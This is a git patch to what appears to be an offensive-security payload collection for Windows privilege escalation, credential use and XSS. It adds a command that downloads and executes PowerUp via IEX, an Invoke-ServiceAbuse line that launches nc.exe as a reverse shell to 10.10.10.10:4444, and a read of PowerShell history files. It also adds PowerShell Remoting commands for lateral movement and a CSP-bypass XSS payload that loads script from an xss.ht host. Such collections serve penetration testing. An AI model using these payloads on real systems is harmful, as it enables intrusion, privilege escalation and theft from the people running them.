From c7e3ea005e8a174664d17d04a5e25a66846c06a5 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 9 Aug 2020 12:15:56 +0200
Subject: [PATCH] Powershell Remoting

---
 .../Windows - Privilege Escalation.md         | 20 +++++++++++++-
 .../Windows - Using credentials.md            | 26 +++++++++++++++++++
 README.md                                     |  8 +++++-
 XSS Injection/README.md                       |  3 ++-
 4 files changed, 54 insertions(+), 3 deletions(-)

diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 814adcb..8e18973 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -457,6 +457,7 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
 ### Powershell history
 
 ```powershell
+type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
 type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
 type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
 cat (Get-PSReadlineOption).HistorySavePath
@@ -676,7 +677,24 @@ wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows
 gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
 ```
 
-Metasploit provides the exploit : `exploit/windows/local/trusted_service_path`
+* Metasploit exploit : `exploit/windows/local/trusted_service_path`
+* PowerUp exploit
+
+    ```powershell
+    # find the vulnerable application
+    C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
+
+    ...
+    [*] Checking for unquoted service paths...
+    ServiceName   : BBSvc
+    Path          : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
+    StartName     : LocalSystem
+    AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
+    ...
+
+    # automatic exploit
+    Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
+    ```
 
 ### Example
 
diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md
index c674732..0fad3a4 100644
--- a/Methodology and Resources/Windows - Using credentials.md	
+++ b/Methodology and Resources/Windows - Using credentials.md	
@@ -11,6 +11,7 @@
     * [Metasploit - Psexec](#metasploit-psexec)
 * [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
 * [WinRM](#winrm)
+* [Powershell Remoting](#powershell-remoting)
 * [Crackmapexec](#crackmapexec)
 * [Winexe](#winexe)
 * [WMI](#wmi)
@@ -147,6 +148,30 @@ conn.shell(:powershell) do |shell|
 end
 ```
 
+
+## Powershell Remoting
+
+> PSSESSION
+
+```powershell
+PS> Enable-PSRemoting
+
+# one-to-one interactive session
+PS> Enter-PSSession -computerName DC01
+[DC01]: PS>
+
+# one-to-one execute scripts and commands
+PS> $Session = New-PSSession -ComputerName CLIENT1
+PS> Invoke-Command -Session $Session -scriptBlock { $test = 1 }
+PS> Invoke-Command -Session $Session -scriptBlock { $test }
+1
+
+# one-to-many execute scripts and commands
+PS> Invoke-Command -computername DC01,CLIENT1 -scriptBlock { Get-Service }
+PS> Invoke-Command -computername DC01,CLIENT1 -filePath c:\Scripts\Task.ps1
+```
+
+
 ## Winexe 
 
 Integrated to Kali
@@ -262,6 +287,7 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
 PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
 ```
 
+
 ## References
 
 - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
diff --git a/README.md b/README.md
index 478a9a5..adcb2fe 100644
--- a/README.md
+++ b/README.md
@@ -4,7 +4,13 @@ A list of useful payloads and bypasses for Web Application Security.
 Feel free to improve with your payloads and techniques !
 I :heart: pull requests :)
 
-You can also contribute with a :beers: IRL
+You can also contribute with a :beers: IRL, or using the sponsor button.
+
+
+<p align="center">
+  <img src="https://repository-images.githubusercontent.com/71220757/fac34f00-9854-11ea-9d6f-55fe78f233fb">
+</p>
+
 
 Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:
 
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 566e054..f0b5536 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -972,7 +972,8 @@ window.frames[0].document.head.appendChild(script);
 ### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
 
 ```js
-d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://yoursubdomain.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
+// CSP Bypass with Inline and Eval
+d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
 ```
 
 ### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen)